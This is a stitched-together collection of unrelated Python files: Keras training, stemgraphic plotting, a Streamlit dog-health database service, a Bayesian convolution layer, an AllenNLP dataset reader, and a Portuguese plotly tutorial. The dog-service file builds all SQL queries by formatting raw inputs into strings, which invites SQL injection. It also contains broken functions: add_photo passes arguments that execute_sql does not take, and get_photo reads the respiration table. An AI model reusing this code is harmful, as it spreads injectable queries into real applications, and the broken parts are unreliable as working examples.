tf.keras.callbacks.ModelCheckpoint(filepath=os.path.join(checkpointsFolder, 'model.{epoch:02d}-{val_loss:.2f}.h5'), save_weights_only=True),
tf.keras.callbacks.TensorBoard(log_dir=logsFolder),
]
model.build((None, frames, 224, 224, 3))
print(model.summary())
model.fit(x=trainSet, callbacks=callbacks, epochs=200, validation_data=valSet,
verbose=1, initial_epoch=0, validation_freq=1,
max_queue_size=10, workers=4, use_multiprocessing=False)
|
"""grid.py. row and col facets."""
import stemgraphic.alpha as alpha
import stemgraphic.num as num
from stemgraphic.num import density_plot
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
from warnings import warn
def small_multiples(
df,
var,
aggregation=False,
axes=None,
bins=None,
box=None,
cols=None,
col_labels=None,
density=False,
density_fill=True,
display=750,
fit=None,
flip_axes=False,
hist=None,
hues=None,
hue_labels=None,
jitter=None,
legend="on",
limit_var=False,
norm_hist=None,
plot_function=None,
random_state=None,
reverse=False,
rows=None,
row_labels=None,
rug=None,
singular=True,
shared_stem=False,
stem_display=True,
stem_order=1,
stem_skip=0,
strip=None,
x_min=0,
x_max=None,
):
"""small multiples.
:param df: list, numpy array, time series, pandas or dask dataframe
:param var:
:param aggregation:
:param axes:
:param bins:
:param box:
:param cols:
:param col_labels:
:param density:
:param density_fill:
:param display:
:param fit:
:param flip_axes:
:param hist:
:param hues:
:param hue_labels:
:param jitter:
:param legend:
:param limit_var:
:param norm_hist:
:param plot_function:
:param random_state:
:param reverse:
:param rows:
:param row_labels:
:param rug:
:param singular:
:param shared_stem:
:param stem_display:
:param stem_order:
:param stem_skip:
:param strip:
:param x_min:
:param x_max:
:return:
"""
if density:
stem_display = None
if df[var].dtypes == "object":
df[var + "_code"] = pd.Categorical(df[var])
df[var + "_code"] = df[var + "_code"].cat.codes.astype("int64")
var = var + "_code"
legend_title = "per {}".format(cols) if cols else ""
legend_title += " per {}".format(rows) if rows else ""
legend_title += " per {}".format(hues) if hues else ""
hue_categories = sorted(df[hues].dropna().unique()) if hues else ["all"]
row_categories = sorted(df[rows].dropna().unique()) if rows else ["all"]
col_categories = sorted(df[cols].dropna().unique()) if cols else ["all"]
hue_labels = hue_labels if hue_labels else hue_categories
row_labels = row_labels if row_labels else row_categories
col_labels = col_labels if col_labels else col_categories
if legend == "top":
offset = 1
else:
offset = 0
nb_rows = len(row_categories)
nb_cols = len(col_categories)
if nb_cols == 0:
nb_cols = 1
if shared_stem and stem_display:
if nb_cols % 2 != 0:
warn(
"Column variable has to have an even number of categories to use back to back stem-and-leaf plots."
)
return None
adjustmentx = 2
adjustmenty = nb_rows
sharex = False
else:
adjustmentx = 1
adjustmenty = nb_rows + 0.5
sharex = False
if axes is None:
fig, (axes) = plt.subplots(
nb_rows + offset,
nb_cols,
sharex=sharex,
sharey=True,
figsize=(nb_rows * 4 * adjustmentx, nb_cols * 4 * adjustmenty),
)
plt.suptitle("Distribution of {}".format(var), ha="center", fontsize=16)
if nb_rows + offset > 1 and nb_cols > 1:
# multidim = "xy"
ax0 = axes[0][0]
ax = axes[0][1]
elif nb_rows + offset > 1:
# multidim = "y"
ax0 = axes[0]
ax = None
else:
# multidim = "x"
ax0 = axes[0]
if legend == "top":
ax0.axis("off")
ax0.axes.set_ylim(0, 0.01)
ax0.set_title(legend_title, loc="left")
for i, val in enumerate(hue_categories):
ax0.scatter(
(i), (0.11), marker="s"
) # outside viewing area, just to generate a legend with squares
if legend == "top":
ax0.legend(
hue_labels, ncol=3, loc="center", fontsize="medium", frameon=False
)
max_max = 0
for k, colval in enumerate(col_categories):
if k % 2 == 1 and shared_stem and stem_display:
ax2 = ax
if nb_cols > 1 and nb_rows - offset > 1:
ax = [i[k] for i in axes]
elif nb_cols > 1 and (nb_rows - offset) == 1:
ax = list(axes[k:])
elif nb_cols > 1:
ax = list(axes[k])
else:
ax = axes
for j, rowval in enumerate(row_categories):
max_peak = 0
loc = "center" if stem_display else "left"
if rows and cols:
ax[j + offset].set_title(
row_labels[j] + " " + col_labels[k], loc=loc, va="top"
)
elif cols:
ax[j + offset].set_title(col_labels[k], loc=loc, va="top")
else:
ax[j + offset].set_title(row_labels[j], loc=loc, va="top")
if cols:
col_filter = df[cols] == colval
if rows:
row_filter = df[rows] == rowval
if rows and cols:
full_filter = row_filter & col_filter
elif rows:
full_filter = row_filter
elif cols:
full_filter = col_filter
to_plot = df[full_filter]
if len(to_plot) > 0:
if k == 0 and stem_display and shared_stem:
secondary_to_plot = to_plot
elif stem_display:
if to_plot[var].dtype.name == "object":
if shared_stem:
alpha.stem_graphic(
to_plot[var].to_frame("word"),
secondary_to_plot[var].to_frame("word"),
aggregation=aggregation,
ax=ax[j + offset],
ax2=ax2[j + offset],
)
else:
alpha.stem_graphic(
to_plot[var].to_frame("word"), ax=ax[j + offset]
)
else:
if shared_stem:
f, a = num.stem_graphic(
to_plot,
secondary_to_plot,
aggregation=aggregation,
ax=ax[j + offset],
ax2=ax2[j + offset],
column=var,
flip_axes=flip_axes,
)
else:
f, a = num.stem_graphic(
to_plot,
aggregation=aggregation,
ax=ax[j + offset],
column=var,
flip_axes=flip_axes,
)
elif plot_function:
plot_function(to_plot, ax=ax[j + offset])
else:
_, ax[j + offset], max_peak, _, _ = density_plot(
to_plot,
var=var,
ax=ax[j + offset],
bins=bins,
box=box,
density=density,
density_fill=density_fill,
display=display,
fit=fit,
fig_only=False,
hist=hist,
hues=hues,
jitter=jitter,
legend=False if legend == "top" else legend,
limit_var=limit_var,
norm_hist=norm_hist,
random_state=random_state,
rug=rug,
strip=strip,
x_min=x_min,
x_max=x_max,
)
ax[j + offset].axes.get_yaxis().set_visible(False)
ax[j + offset].axes.set_xlabel("")
if max_peak > max_max:
max_max = max_peak
if limit_var:
true_min = df[var][full_filter].dropna().min()
true_max = df[var][full_filter].dropna().max()
if stem_display:
if flip_axes:
ax[j + offset].set_xlim(true_min, true_max)
ax[j + offset].set_ylim(0, true_max * 2)
else:
ax[j + offset].set_xlim(0, true_max * 2)
ax[j + offset].set_ylim(true_min, true_max)
if x_min and x_max:
ax[j + offset].set_xlim(x_min, x_max)
if density or hist or rug:
ax[j + offset].set_ylim(0, max_max + 0.005)
if legend != "top" and legend:
ax[0].legend(
hue_labels, ncol=3, loc="upper right", fontsize="medium", frameon=False
)
plt.box(False)
sns.despine(left=True, bottom=True, top=True, right=True)
if not density or (shared_stem and stem_display):
plt.tight_layout()
return fig, axes, df[var][full_filter]
|
<gh_stars>1-10
import datetime
import os
from io import BytesIO, StringIO
from logging import error
import pandas as pd
import psycopg2
import streamlit as st
from matplotlib import pyplot as plt
from pandas import DataFrame as df
from PIL import Image
# streamlit run /Users/apple/Documents/GitHub/SummerSession_2021/DogService.py
# Initialize connection.
# Uses st.cache to only run once.
# @st.cache(allow_output_mutation=True, hash_funcs={"_thread.RLock": lambda _: None})
def init_connection():
return psycopg2.connect(**st.secrets["postgres"])
conn = init_connection()
# Perform query.
# Uses st.cache to only rerun when the query changes or after 10 min.
# @st.cache(ttl=600)
def run_query(query):
with conn.cursor() as cur:
cur.execute(query)
return cur.fetchall()
def execute_sql(insert):
with conn.cursor() as cur:
cur.execute(insert)
conn.commit()
def get_all_dogs():
dog_entries = run_query("SELECT * from dogs;")
# print(rows[0])
id_list = []
name_list = []
resign_list = []
birthday_list = []
gender_list = []
species_list = []
for r in dog_entries:
id_list.append(r[0])
name_list.append(r[1])
resign_list.append(r[2])
birthday_list.append(r[3])
gender_list.append('male' if r[4]==1 else 'female')
species_list.append(r[5])
dog_dict = {
'id':id_list,
'name':name_list,
'resign':resign_list,
'birthday':birthday_list,
'gender':gender_list,
'species':species_list
}
return df(dog_dict).set_index(['id'])
def get_dogs_by_name(name):
dogs = get_all_dogs()
return dogs[dogs['name']==name]
def resign_dogs(name,birthday,male,species):
x = '''
insert into dogs (name, resign, birthday, male, species) VALUES
(\'{}\',now(),\'{}\',{},\'{}\');
'''.format(name,birthday,male,species)
execute_sql(x)
print(x)
print('done!')
def delete_dogs(name):
execute_sql('''
delete from dogs where name=\'{}\';
'''.format(name))
def get_dog_id_by_name(name):
return get_dogs_by_name(name)['id']
def add_temperature(dog_id,temperature):
execute_sql('''
insert into temperature (temperature, dog_id, time) VALUES
({},\'{}\',now());
'''.format(temperature,dog_id))
def get_temperature(dog_id):
q = run_query('select temperature,time from temperature where dog_id={} order by time;'.format(dog_id))
temp_list = []
time_list = []
for e in q:
temp_list.append(e[0])
time_list.append(e[1])
return df({
'temperature':temp_list,
'time':time_list
})
def add_gesture(dog_id,gesture):
execute_sql('''
insert into gesture (gesture, dog_id, time) VALUES
(\'{}\',\'{}\',now());
'''.format(gesture,dog_id))
def get_gesture(dog_id):
q = run_query('select gesture,time from gesture where dog_id={} order by time;'.format(dog_id))
ges_list = []
time_list = []
for e in q:
ges_list.append(e[0])
time_list.append(e[1])
return df({
'gesture':ges_list,
'time':time_list
})
def add_weight(dog_id,weight):
execute_sql('''
insert into weight (weight, dog_id, time) VALUES
({},\'{}\',now());
'''.format(weight,dog_id))
def get_weight(dog_id):
q = run_query('select weight,time from weight where dog_id={} order by time;'.format(dog_id))
wei_list = []
time_list = []
for e in q:
wei_list.append(e[0])
time_list.append(e[1])
return df({
'weight':wei_list,
'time':time_list
})
def add_heart_rate(dog_id,heart_rate):
execute_sql('''
insert into heart_rate (heart_rate, dog_id, time) VALUES
({},\'{}\',now());
'''.format(heart_rate,dog_id))
def get_heart_rate(dog_id):
q = run_query('select heart_rate,time from heart_rate where dog_id={} order by time;'.format(dog_id))
rat_list = []
time_list = []
for e in q:
rat_list.append(e[0])
time_list.append(e[1])
return df({
'heart_rate':rat_list,
'time':time_list
})
def add_respire_rate(dog_id,respire_rate):
execute_sql('''
insert into respire_rate (respire_rate, dog_id, time) VALUES
({},\'{}\',now());
'''.format(respire_rate,dog_id))
def get_respire_rate(dog_id):
q = run_query('select respire_rate,time from respire_rate where dog_id={} order by time;'.format(dog_id))
temp_list = []
time_list = []
for e in q:
temp_list.append(e[0])
time_list.append(e[1])
return df({
'respire_rate':temp_list,
'time':time_list
})
def add_photo(dog_id,dir):
with open(dir,'rb') as f:
img_buffer = f.read()
binaryCoding = psycopg2.Binary(img_buffer)
execute_sql('''
insert into dog_photo(picture, dog_id, time) VALUES
(\'{}\',\'{}\',now());
''',binaryCoding,dog_id)
def get_photo(dog_id):
q = run_query('select respire_rate,time from respire_rate where dog_id={} order by time;'.format(dog_id))
temp_list = []
time_list = []
for e in q:
temp_list.append(Image.open(BytesIO(e[0])))
time_list.append(e[1])
return df({
'respire_rate':temp_list,
'time':time_list
})
if __name__ == '__main__':
# print(get_all_dogs())
# resign_dogs('Gammago','2017-4-9','false','Hashiqi')
# print('execute!')
pass
|
<filename>torchbnn/modules/conv.py
import math
import torch
import torch.nn.init as init
from torch.nn import Module, Parameter
import torch.nn.functional as F
from torch.nn.modules.utils import _single, _pair, _triple
class _BayesConvNd(Module):
r"""
Applies Bayesian Convolution
Arguments:
prior_mu (Float): mean of prior normal distribution.
prior_sigma (Float): sigma of prior normal distribution.
.. note:: other arguments are following conv of pytorch 1.2.0.
https://github.com/pytorch/pytorch/blob/master/torch/nn/modules/conv.py
"""
__constants__ = ['prior_mu', 'prior_sigma', 'stride', 'padding', 'dilation',
'groups', 'bias', 'padding_mode', 'output_padding', 'in_channels',
'out_channels', 'kernel_size']
def __init__(self, prior_mu, prior_sigma, in_channels, out_channels, kernel_size, stride,
padding, dilation, transposed, output_padding,
groups, bias, padding_mode):
super(_BayesConvNd, self).__init__()
if in_channels % groups != 0:
raise ValueError('in_channels must be divisible by groups')
if out_channels % groups != 0:
raise ValueError('out_channels must be divisible by groups')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.transposed = transposed
self.output_padding = output_padding
self.groups = groups
self.padding_mode = padding_mode
self.prior_mu = prior_mu
self.prior_sigma = prior_sigma
self.prior_log_sigma = math.log(prior_sigma)
if transposed:
self.weight_mu = Parameter(torch.Tensor(
in_channels, out_channels // groups, *kernel_size))
self.weight_log_sigma = Parameter(torch.Tensor(
in_channels, out_channels // groups, *kernel_size))
self.register_buffer('weight_eps', None)
else:
self.weight_mu = Parameter(torch.Tensor(
out_channels, in_channels // groups, *kernel_size))
self.weight_log_sigma = Parameter(torch.Tensor(
out_channels, in_channels // groups, *kernel_size))
self.register_buffer('weight_eps', None)
if bias is None or bias is False :
self.bias = False
else :
self.bias = True
if self.bias:
self.bias_mu = Parameter(torch.Tensor(out_channels))
self.bias_log_sigma = Parameter(torch.Tensor(out_channels))
self.register_buffer('bias_eps', None)
else:
self.register_parameter('bias_mu', None)
self.register_parameter('bias_log_sigma', None)
self.register_buffer('bias_eps', None)
self.reset_parameters()
def reset_parameters(self):
# Initialization method of Adv-BNN.
n = self.in_channels
n *= self.kernel_size[0] ** 2
stdv = 1.0 / math.sqrt(n)
self.weight_mu.data.uniform_(-stdv, stdv)
self.weight_log_sigma.data.fill_(self.prior_log_sigma)
if self.bias :
self.bias_mu.data.uniform_(-stdv, stdv)
self.bias_log_sigma.data.fill_(self.prior_log_sigma)
# Initialization method of the original torch nn.conv.
# init.kaiming_uniform_(self.weight_mu, a=math.sqrt(5))
# self.weight_log_sigma.data.fill_(self.prior_log_sigma)
# if self.bias :
# fan_in, _ = init._calculate_fan_in_and_fan_out(self.weight_mu)
# bound = 1 / math.sqrt(fan_in)
# init.uniform_(self.bias_mu, -bound, bound)
# self.bias_log_sigma.data.fill_(self.prior_log_sigma)
def freeze(self) :
self.weight_eps = torch.randn_like(self.weight_log_sigma)
if self.bias :
self.bias_eps = torch.randn_like(self.bias_log_sigma)
def unfreeze(self) :
self.weight_eps = None
if self.bias :
self.bias_eps = None
def extra_repr(self):
s = ('{prior_mu}, {prior_sigma}'
', {in_channels}, {out_channels}, kernel_size={kernel_size}'
', stride={stride}')
if self.padding != (0,) * len(self.padding):
s += ', padding={padding}'
if self.dilation != (1,) * len(self.dilation):
s += ', dilation={dilation}'
if self.output_padding != (0,) * len(self.output_padding):
s += ', output_padding={output_padding}'
if self.groups != 1:
s += ', groups={groups}'
if self.bias is False:
s += ', bias=False'
return s.format(**self.__dict__)
def __setstate__(self, state):
super(_BayesConvNd, self).__setstate__(state)
if not hasattr(self, 'padding_mode'):
self.padding_mode = 'zeros'
class BayesConv2d(_BayesConvNd):
r"""
Applies Bayesian Convolution for 2D inputs
Arguments:
prior_mu (Float): mean of prior normal distribution.
prior_sigma (Float): sigma of prior normal distribution.
.. note:: other arguments are following conv of pytorch 1.2.0.
https://github.com/pytorch/pytorch/blob/master/torch/nn/modules/conv.py
"""
def __init__(self, prior_mu, prior_sigma, in_channels, out_channels, kernel_size, stride=1, padding=0, dilation=1, groups=1, bias=True, padding_mode='zeros'):
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
super(BayesConv2d, self).__init__(
prior_mu, prior_sigma, in_channels, out_channels, kernel_size, stride,
padding, dilation, False, _pair(0), groups, bias, padding_mode)
def conv2d_forward(self, input, weight):
if self.bias:
if self.bias_eps is None :
bias = self.bias_mu + torch.exp(self.bias_log_sigma) * torch.randn_like(self.bias_log_sigma)
else :
bias = self.bias_mu + torch.exp(self.bias_log_sigma) * self.bias_eps
else :
bias = None
if self.padding_mode == 'circular':
expanded_padding = ((self.padding[1] + 1) // 2, self.padding[1] // 2,
(self.padding[0] + 1) // 2, self.padding[0] // 2)
return F.conv2d(F.pad(input, expanded_padding, mode='circular'),
weight, bias, self.stride,
_pair(0), self.dilation, self.groups)
return F.conv2d(input, weight, bias, self.stride,
self.padding, self.dilation, self.groups)
def forward(self, input):
r"""
Overriden.
"""
if self.weight_eps is None :
weight = self.weight_mu + torch.exp(self.weight_log_sigma) * torch.randn_like(self.weight_log_sigma)
else :
weight = self.weight_mu + torch.exp(self.weight_log_sigma) * self.weight_eps
return self.conv2d_forward(input, weight) |
from typing import Dict, Union
import logging
from overrides import overrides
import numpy as np
from allennlp.common.checks import ConfigurationError
from allennlp.common.file_utils import cached_path
from allennlp.common.util import START_SYMBOL, END_SYMBOL
from allennlp.data.dataset_readers.dataset_reader import DatasetReader
from allennlp.data.fields import TextField, LabelField, ArrayField, MetadataField
from allennlp.data.instance import Instance
from allennlp.data.tokenizers import Token, Tokenizer
from allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer
from matchmaker.dataloaders.transformer_tokenizer import *
from blingfire import *
import torch
import random
class IndependentTrainingDatasetReader(DatasetReader):
"""
Read a tsv file containing training triple sequences
Expected format for each input line: <query_sequence_string>\t<pos_doc_sequence_string>\t<neg_doc_sequence_string>
The output of ``read`` is a list of ``Instance`` s with the fields:
query_tokens: ``TextField`` and
doc_pos_tokens: ``TextField`` and
doc_neg_tokens: ``TextField``
Parameters
----------
tokenizer : ``Tokenizer``, optional
Tokenizer to use to split the input sequences into words or other kinds of tokens.
token_indexers : ``Dict[str, TokenIndexer]``, optional
Indexers used to define input (source side) token representations. Defaults to
``{"tokens": SingleIdTokenIndexer()}``.
"""
def __init__(self,
tokenizer=None,
token_indexers: Dict[str, TokenIndexer] = None,
max_doc_length: int = -1,
max_query_length: int = -1,
min_doc_length: int = -1,
min_query_length: int = -1,
data_augment: str = "none",
make_multiple_of: int = -1,
query_augment_mask_number: int = -1,
train_pairwise_distillation: bool = False,
train_qa_spans: bool = False):
super().__init__(
manual_distributed_sharding=True,
manual_multiprocess_sharding=True
)
self._tokenizer = tokenizer
self._token_indexers = token_indexers
self.max_doc_length = max_doc_length
self.max_query_length = max_query_length
self.min_doc_length = min_doc_length
self.min_query_length = min_query_length
self.data_augment = data_augment
if type(tokenizer) == FastTransformerTokenizer:
self.token_type = "huggingface"
else:
self.token_type = "emb"
self.padding_value = Token(text="@@PADDING@@", text_id=0)
self.cls_value = Token(text="@@UNKNOWN@@", text_id=1)
self.lucene_stopwords = set(["a", "an", "and", "are", "as", "at", "be", "but", "by", "for", "if", "in", "into", "is", "it", "no", "not", "of",
"on", "or", "such", "that", "the", "their", "then", "there", "these", "they", "this", "to", "was", "will", "with"])
self.msmarco_top_50_stopwords = set([".", "the", ",", "of", "and", "a", "to", "in", "is", "-", "for", ")", "(", "or", "you", "that", "are", "on", "it", ":", "as", "with", "your",
"'s", "from", "by", "be", "can", "an", "this", "1", "at", "have", "2", "not", "/", "was", "if", "$", "will", "i", "one", "which", "more", "has", "3", "but", "when", "what", "all"])
self.msmarco_top_25_stopwords = set([".", "the", ",", "of", "and", "a", "to", "in", "is", "-", "for", ")",
"(", "or", "you", "that", "are", "on", "it", ":", "as", "with", "your", "'s", "from"])
self.use_stopwords = False
self.make_multiple_of = make_multiple_of
self.query_augment_mask_number = query_augment_mask_number
self.max_title_length = 30
self.min_title_length = -1
self.read_with_scores = train_pairwise_distillation
self.train_qa_spans = train_qa_spans
self.add_text_to_batch = False
@overrides
def _read(self, file_path):
with open(cached_path(file_path), "r", encoding="utf8") as data_file:
for line in self.shard_iterable(data_file):
line = line.strip("\n")
if not line:
continue
line_parts = line.split('\t')
pos_score = None
neg_score = None
pos_score_passages = None
neg_score_passages = None
pos_title = None
neg_title = None
qa_spans_pos = None
if not self.read_with_scores and not self.train_qa_spans:
if len(line_parts) == 3:
query_sequence, doc_pos_sequence, doc_neg_sequence = line_parts
elif len(line_parts) == 5:
query_sequence, pos_title, doc_pos_sequence, neg_title, doc_neg_sequence = line_parts
else:
raise ConfigurationError("Invalid line format: %s" % (line))
elif self.train_qa_spans:
if len(line_parts) == 4:
qa_spans_pos, query_sequence, doc_pos_sequence, doc_neg_sequence = line_parts
else:
raise ConfigurationError("Invalid line format: %s" % (line))
else:
if len(line_parts) == 5:
pos_score, neg_score, query_sequence, doc_pos_sequence, doc_neg_sequence = line_parts
elif len(line_parts) == 7:
pos_score, pos_score_passages, neg_score, neg_score_passages, query_sequence, doc_pos_sequence, doc_neg_sequence = line_parts
else:
raise ConfigurationError("Invalid line format: %s" % (line))
inst = self.text_to_instance(query_sequence, doc_pos_sequence, doc_neg_sequence, pos_title, neg_title, pos_score, neg_score, qa_spans_pos, pos_score_passages, neg_score_passages)
if inst is not None: # this should not happen (but just in case we don't break training)
yield inst
@overrides
def text_to_instance(self, query_sequence: str, doc_pos_sequence: str, doc_neg_sequence: str, pos_title, neg_title,
pos_score, neg_score, qa_spans_pos, pos_score_passages, neg_score_passages) -> Instance: # type: ignore
# pylint: disable=arguments-differ
def data_augment(aug_type, string):
if aug_type == "shuffle_sent":
doc_sequence = text_to_sentences(string).split("\n")
random.shuffle(doc_sequence)
doc_sequence = " ".join(doc_sequence)
elif aug_type == "reverse_sent":
doc_sequence = text_to_sentences(string).split("\n")
doc_sequence = " ".join(doc_sequence[::-1])
elif aug_type == "rotate":
tokens = text_to_words(string).split()
n = random.randint(0, len(tokens)-1)
doc_sequence = " ".join(tokens[n:] + tokens[:n])
elif aug_type == "none":
doc_sequence = string
else:
raise Exception("wrong aug_type")
return doc_sequence
if self.data_augment != "none":
if len(doc_pos_sequence) == 0 or len(doc_neg_sequence) == 0:
return None
doc_pos_sequence = data_augment(self.data_augment, doc_pos_sequence)
doc_neg_sequence = data_augment(self.data_augment, doc_neg_sequence)
if self.token_type == "huggingface":
query_tokenized = self._tokenizer.tokenize(query_sequence, max_length=self.max_query_length)
if self.query_augment_mask_number > -1:
query_tokenized["input_ids"] = torch.cat([torch.nn.functional.pad(query_tokenized["input_ids"][:-1],
(0, self.query_augment_mask_number),
value=self._tokenizer._tokenizer.mask_token_id), query_tokenized["input_ids"][-1].unsqueeze(0)])
query_tokenized["attention_mask"] = torch.nn.functional.pad(query_tokenized["attention_mask"],
(0, self.query_augment_mask_number),
value=1)
query_field = PatchedTransformerTextField(**query_tokenized)
else:
query_tokenized = self._tokenizer.tokenize(query_sequence)
if self.max_query_length > -1:
query_tokenized = query_tokenized[:self.max_query_length]
if self.min_query_length > -1 and len(query_tokenized) < self.min_query_length:
query_tokenized = query_tokenized + [self.padding_value] * (self.min_query_length - len(query_tokenized))
# if self.make_multiple_of > -1 and len(query_tokenized) % self.make_multiple_of != 0:
# query_tokenized = query_tokenized + [self.padding_value] * (self.make_multiple_of - len(query_tokenized) % self.make_multiple_of)
query_field = TextField(query_tokenized)
if self.token_type == "huggingface":
doc_pos_tokenized = self._tokenizer.tokenize(doc_pos_sequence, max_length=self.max_doc_length)
doc_pos_field = PatchedTransformerTextField(**doc_pos_tokenized)
else:
doc_pos_tokenized = self._tokenizer.tokenize(doc_pos_sequence)
if self.max_doc_length > -1:
doc_pos_tokenized = doc_pos_tokenized[:self.max_doc_length]
if self.min_doc_length > -1 and len(doc_pos_tokenized) < self.min_doc_length:
doc_pos_tokenized = doc_pos_tokenized + [self.padding_value] * (self.min_doc_length - len(doc_pos_tokenized))
# if self.make_multiple_of > -1 and len(doc_pos_tokenized) % self.make_multiple_of != 0:
# doc_pos_tokenized = doc_pos_tokenized + [self.padding_value] * (self.make_multiple_of - len(doc_pos_tokenized) % self.make_multiple_of)
# if self.use_stopwords:
# doc_pos_tokenized_filtered = []
# for t in doc_pos_tokenized:
# if t.text not in self.msmarco_top_25_stopwords:
# doc_pos_tokenized_filtered.append(t)
# doc_pos_tokenized = doc_pos_tokenized_filtered
doc_pos_field = TextField(doc_pos_tokenized)
if self.token_type == "huggingface":
doc_neg_tokenized = self._tokenizer.tokenize(doc_neg_sequence, max_length=self.max_doc_length)
doc_neg_field = PatchedTransformerTextField(**doc_neg_tokenized)
else:
doc_neg_tokenized = self._tokenizer.tokenize(doc_neg_sequence)
if self.max_doc_length > -1:
doc_neg_tokenized = doc_neg_tokenized[:self.max_doc_length]
if self.min_doc_length > -1 and len(doc_neg_tokenized) < self.min_doc_length:
doc_neg_tokenized = doc_neg_tokenized + [self.padding_value] * (self.min_doc_length - len(doc_neg_tokenized))
# if self.make_multiple_of > -1 and len(doc_neg_tokenized) % self.make_multiple_of != 0:
# doc_neg_tokenized = doc_neg_tokenized + [self.padding_value] * (self.make_multiple_of - len(doc_neg_tokenized) % self.make_multiple_of)
# if self.use_stopwords:
# doc_neg_tokenized_filtered = []
# for t in doc_neg_tokenized:
# if t.text not in self.msmarco_top_25_stopwords:
# doc_neg_tokenized_filtered.append(t)
# doc_neg_tokenized = doc_neg_tokenized_filtered
doc_neg_field = TextField(doc_neg_tokenized)
if len(query_tokenized) == 0 or len(doc_neg_tokenized) == 0 or len(doc_pos_tokenized) == 0:
return None
ret_instance = {
"query_tokens": query_field,
"doc_pos_tokens": doc_pos_field,
"doc_neg_tokens": doc_neg_field}
if self.read_with_scores:
ret_instance["pos_score"] = ArrayField(np.array(float(pos_score)))
ret_instance["neg_score"] = ArrayField(np.array(float(neg_score)))
if pos_score_passages != None:
pos_score_passages = [float(f) for f in pos_score_passages.split()]
ret_instance["pos_score_passages"] = ArrayField(np.array(pos_score_passages))
if neg_score_passages != None:
neg_score_passages = [float(f) for f in neg_score_passages.split()]
ret_instance["neg_score_passages"] = ArrayField(np.array(neg_score_passages))
if pos_title != None:
if self.token_type == "huggingface": # ugly fix, because tokenize() reads that var and no param
self._tokenizer._max_length = self.max_title_length - 2
pos_title_tokenized = self._tokenizer.tokenize(pos_title)
neg_title_tokenized = self._tokenizer.tokenize(neg_title)
if self.max_title_length > -1:
pos_title_tokenized = pos_title_tokenized[:self.max_title_length]
neg_title_tokenized = neg_title_tokenized[:self.max_title_length]
if self.min_title_length > -1 and len(pos_title_tokenized) < self.min_title_length:
pos_title_tokenized = pos_title_tokenized + [self.padding_value] * (self.min_title_length - len(pos_title_tokenized))
if self.min_title_length > -1 and len(neg_title_tokenized) < self.min_title_length:
neg_title_tokenized = neg_title_tokenized + [self.padding_value] * (self.min_title_length - len(neg_title_tokenized))
# if self.make_multiple_of > -1 and len(seq_tokenized) % self.make_multiple_of != 0:
# seq_tokenized = seq_tokenized + [self.padding_value] * (self.make_multiple_of - len(seq_tokenized) % self.make_multiple_of)
# pos_title_tokenized.insert(0,self.cls_value)
# neg_title_tokenized.insert(0,self.cls_value)
pos_title_field = TextField(pos_title_tokenized, self._token_indexers)
neg_title_field = TextField(neg_title_tokenized, self._token_indexers)
ret_instance["title_pos_tokens"] = pos_title_field
ret_instance["title_neg_tokens"] = neg_title_field
if self.add_text_to_batch:
ret_instance["query_text"] = MetadataField(query_sequence)
ret_instance["doc_pos_text"] = MetadataField(doc_pos_sequence)
ret_instance["doc_neg_text"] = MetadataField(doc_neg_sequence)
return Instance(ret_instance)
@overrides
def apply_token_indexers(self, instance: Instance) -> None:
if self.token_type != "huggingface":
instance.fields["query_tokens"]._token_indexers = self._token_indexers # type: ignore
instance.fields["doc_pos_tokens"]._token_indexers = self._token_indexers # type: ignore
instance.fields["doc_neg_tokens"]._token_indexers = self._token_indexers # type: ignore
|
<gh_stars>0
# Gráficos interativos com o *plotly*
## Gráficos de linha
Vamos começar criando gráficos de linha.
Primeiramente utilizaremos um pacote rápido e eficiente para a construção de gráficos interativos: o **plotly.express**
Para este tipo de plot é conveniente ter apenas um valor possível para a coordenada *y* e ter uma segunda coluna determinando a cor a ser utilizada.
Vamos então refazer nosso exemplo do Covid por regiões.
import plotly.express as px
Preparando o banco de dados para o **plotly.express**:
covid_regioes_px = covid_BR.set_index('data').query('regiao != "Brasil"')[['obitosAcumulado', 'regiao']].reset_index().rename(
{'obitosAcumulado':'Total de Óbitos','regiao':'Região','data':'Data'},axis=1)
covid_regioes_px = covid_regioes_px.groupby(['Região','Data']).sum()/2
covid_regioes_px = covid_regioes_px.reset_index().set_index('Data')
fig = px.line(covid_regioes_px, y="Total de Óbitos", color="Região",
line_group="Região", hover_name="Região", title='Óbitos de COVID-19 nas regiões do Brasil')
fig.show()
Podemos fixar o mesmo valor da coordenada *x* para todas as regiões na hora de passar o *mouse*:
fig = px.line(covid_regioes_px, y="Total de Óbitos", color="Região",
line_group="Região", hover_name="Região", title='Óbitos de COVID-19 nas regiões do Brasil')
fig.update_layout(hovermode='x unified')
fig.show()
Vamos agora construir o mesmo gráfico com o pacote **plotly.graph_objects**.
Não possui a simplicidade do **plotly.express**, porém possui mais flexibilidade e é mais "customizável".
Para exemplificar a utilidade dele, vamos utilizar no conjunto de dados *covid_regioes* que possui 5 colunas distintas como valores de *y*.
Além disso, veremos que o gráfico com *x* unificado ficará naturalmente melhor no **plotly.graph_objects**.
Muitos argumentos disponíveis no **plotly.graph_objects** não estão disponíveis no **plotly.express**.
import plotly.graph_objects as go
fig = go.Figure()
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Norte'], mode='lines', name='Norte'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Nordeste'], mode='lines', name='Nordeste'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Centro-Oeste'], mode='lines', name='Centro-Oeste'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Sudeste'], mode='lines', name='Sudeste'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Sul'], mode='lines', name='Sul'))
fig.update_layout( title='Óbitos de COVID-19 nas regiões do Brasil',
xaxis_title='Data', yaxis_title='Total de Óbitos', legend_title_text='Região', hovermode='x unified')
Vamos agora reordenar para melhor apresentação:
fig = go.Figure()
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Sudeste'], mode='lines', name='Sudeste'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Nordeste'], mode='lines', name='Nordeste'))
fig.add_trace(go.Scatter(x=covid_regioes.index, y=covid_regioes['obitos_Norte'], mode='lines', name='Norte'))
